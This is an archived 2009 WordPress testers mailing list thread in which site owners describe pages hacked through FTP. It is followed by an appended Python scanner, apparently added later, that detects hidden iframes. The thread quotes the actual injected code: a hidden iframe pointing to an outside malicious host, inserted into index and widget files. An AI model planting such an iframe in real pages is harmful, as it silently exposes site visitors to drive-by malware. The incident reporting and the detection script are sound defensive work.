you might be in trouble...

On Thu, Jul 23, 2009 at 5:08 PM, Kirk M <[email protected]> wrote:
> Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my
> sites for awhile rather than Windows at least until I get everything changed
> around and my Windows partition fully scanned. I have several FTP accounts
> configured, many are for other site owners who ask me to maintain their WP
> powered sites. It definitely wouldn't do to have those get hacked.
>
>
> On 07/23/2009 05:50 PM, Chris Carter wrote:
>
>> Change your pwds and scan away.. I used cpanel file manager for a while to
>> make sure they stopped attacking .. looking at logs, it hits and is tagged
>> with googlebot, but the IPs are strange
>>
>> Anyway, This virus looks for files with:
>>
>> index*.*
>> default*.*
>> main*.*
>> home*.*
>>
>> (I built a static php includes site, and only files named like the above
>> were affected)
>>
>> Also might want to check your CGI-BIN for files that look suspicious
>>
>> It's basically a bot that logs in, finds any files in all directories
>> that start with the above
>>
>> ...funny thing was that sometimes where they inject it, PHP code throws
>> errors. They need to revise their bot to work outside the <? tags :)
>>
>> -Chris
>> 314media.com
>>
>> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh <[email protected]> wrote:
>>
>>> Yeah..my Wordpress mu install also got hacked. Just confirmed.
>>>
>>> On Fri, Jul 24, 2009 at 2:48 AM, dinu <[email protected]> wrote:
>>>
>>>> I had to restore from backup. the entire blog
>>>> when I first saw Default.widgets.php hacked, I tried restoring only that
>>>> page. But then I found hidden iframe codes on all of my pages (including
>>>> pages after login)
>>>>
>>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I
>>>> would think it's not a wordpress issue.
>>>>
>>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh <[email protected]> wrote:
>>>>
>>>>> 2.8.1 at the time of being hacked.
>>>>> Just upgraded to 2.8.2
>>>>>
>>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar <[email protected]> wrote:
>>>>>
>>>>>> What version of wordpress are you running?
>>>>>>
>>>>>> --------------------------------------------------
>>>>>> From: "Chris Carter" <[email protected]>
>>>>>> Sent: Thursday, July 23, 2009 3:43 PM
>>>>>> To: <[email protected]>
>>>>>> Cc: <[email protected]>; <[email protected]>
>>>>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>>>>>>
>>>>>>> I keep getting hacked with that code inserted into
>>>>>>> admin/default-filters
>>>>>>>
>>>>>>> Chris Carter
>>>>>>> President
>>>>>>> 314media.com
>>>>>>> 314-714-5448
>>>>>>>
>>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh <[email protected]> wrote:
>>>>>>>
>>>>>>>> I have a blog running on 2.8.2 and suddenly now I find all index.php
>>>>>>>> and wp-includes/Default.widgets.php hacked with following code
>>>>>>>> inserted randomly :
>>>>>>>>
>>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>>>>>>>> height=125 style="visibility: hidden"></iframe>
>>>>>>>>
>>>>>>>> How to prevent further hacking? I am currently replacing all the
>>>>>>>> files affected since all of them affected at a certain date. I am on a
>>>>>>>> shared hosting and only one blog got attacked.
>>>>>>>>
>>>>>>>> Regards
>>>>>>>> Navjot Singh
>>>>>>>> _______________________________________________
>>>>>>>> wp-testers mailing list
>>>>>>>> [email protected]
>>>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>
>>>> --
>>>> With Love
>>>> Dinu
>>>>
>>>> http://chromestory.com
>>>> http://offlineblog.net
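
A read-only check for the injection this thread describes, added here as an example and not code from any poster: it walks a site directory, flags `<iframe>` tags hidden with CSS or a 0/1-pixel size, and notes whether the file name starts with one of the prefixes Chris Carter lists. The function names, the sample tree and the `example.invalid` URLs are constructed for the example.

```python
import os
import re
import tempfile

# Name prefixes the thread reports as targeted: index*, default*, main*, home*.
TARGET_PREFIXES = ("index", "default", "main", "home")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Attributes that hide a frame: CSS hiding, or a 0/1-pixel width or height.
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none"
    r"|\b(?:width|height)\s*=\s*[\"']?[01]\b",
    re.IGNORECASE,
)


def find_hidden_iframes(root):
    """Return sorted (relative_path, name_is_targeted, iframe_tag) tuples."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            targeted = name.lower().startswith(TARGET_PREFIXES)
            for tag in IFRAME_RE.findall(text):
                if HIDDEN_RE.search(tag):
                    hits.append((rel, targeted, tag))
    return sorted(hits)


def demo():
    """Scan a constructed sample tree (file contents are made up for the example)."""
    hidden = ('<iframe src="http://example.invalid/x" width=125 height=125 '
              'style="visibility: hidden"></iframe>')
    samples = {
        "index.php": "<?php echo 'hi'; ?>\n" + hidden,
        "wp-includes/Default.widgets.php": "<?php " + hidden + " ?>",  # inside PHP tags
        "about.php": '<iframe src="http://example.invalid/v" width="560" height="315"></iframe>',
        "home.html": "<p>clean</p>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_hidden_iframes(root)


if __name__ == "__main__":
    for rel, targeted, tag in demo():
        print(rel, "(targeted name)" if targeted else "", tag)
```

Run `find_hidden_iframes` against a downloaded copy of the site rather than the live document root, and compare the flagged files' modification dates, since the original poster notes the affected files all changed on one date.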
